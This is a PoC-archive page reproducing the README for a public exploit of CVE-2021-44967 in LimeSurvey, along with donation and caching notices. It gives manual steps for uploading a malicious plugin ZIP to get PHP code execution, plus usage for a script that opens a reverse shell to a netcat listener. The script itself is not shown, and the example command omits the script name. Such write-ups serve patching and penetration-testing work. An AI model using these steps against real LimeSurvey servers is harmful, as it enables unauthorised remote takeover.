Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2021-44967 PoC — LimeSurvey 代码问题漏洞

Source
https://github.com/D3Ext/CVE-2021-44967
Associated Vulnerability
Title:LimeSurvey 代码问题漏洞 (CVE-2021-44967)
Description:LimeSurvey(前称PHPSurveyor)是LimeSurvey(Limesurvey)团队的一套开源的在线问卷调查程序,它支持调查程序开发、调查问卷发布以及数据收集等功能。 LimeSurvey 5.2.4 存在安全漏洞,该漏洞允许远程恶意用户上传任意PHP代码文件。
Description
POC exploit for CVE-2021-44967
Readme
# CVE-2021-44967

This repository contains a POC (Proof of Concept) of the CVE-2021-44967 vulnerability, which affects to LimeSurvey 5.2 and higher versions. It allows an authenticated user to upload its own malicious plugins, leading to a RCE (Remote Code Execution) through PHP code execution. This exploit uses a PHP reverse shell which is triggered once the malicious plugin is uploaded.

# Explanation

This vulnerability consists on creating a XML config file, a PHP file and then compressing them into a ZIP file. Once you have uploaded, installed and activated the plugin, the PHP code should be accessible on the web. It can be exploited manually following this steps:

1. Create a ZIP containing the PHP file and the config file
2. Login into LimeSurvey
3. Go to Configuration -> Plugins -> Upload & Install
4. Upload your ZIP file
5. Install it
6. Finally, activate your plugin
7. Then your PHP code should be accessible under /upload/plugins/<plugin_name>/<php_file>

# Usage

```
usage: exploit.py [-h] --url URL --user USER --password PASSWORD --lhost LHOST --lport LPORT [--verbose]

LimeSurvey - RCE

options:
  -h, --help           show this help message and exit
  --url URL            URL of the LimeSurvey web root
  --user USER          username to log in
  --password PASSWORD  password of the username
  --lhost LHOST        local host to receive the reverse shell
  --lport LPORT        local port to receive the reverse shell
  --verbose            enable verbose
```

Start a netcat listener and then execute the exploit like this:

```
python3 --url <URL> --user <username> --password <password> --lhost <local host> --lport <local port>
```

# Demo

<img src="demo.png">

# References

```
https://github.com/Y1LD1R1M-1337/Limesurvey-RCE
https://www.exploit-db.com/exploits/50573
https://github.com/p0dalirius/LimeSurvey-webshell-plugin
https://ine.com/blog/cve-2021-44967-limesurvey-rce
https://pentest-tools.com/vulnerabilities-exploits/limesurvey-524-rce-vulnerability_13029
```

# License

This project is under [MIT](https://github.com/D3Ext/LimeSurvey-RCE/blob/main/LICENSE) license

Copyright © 2025, *D3Ext*
File Snapshot

 [4.0K]  /data/pocs/fe23c81845b6da5a76f693bf8333e261ef8ea354
├── [103K]  demo.png
├── [9.2K]  exploit.py
├── [1.0K]  LICENSE
└── [2.1K]  README.md

0 directories, 4 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.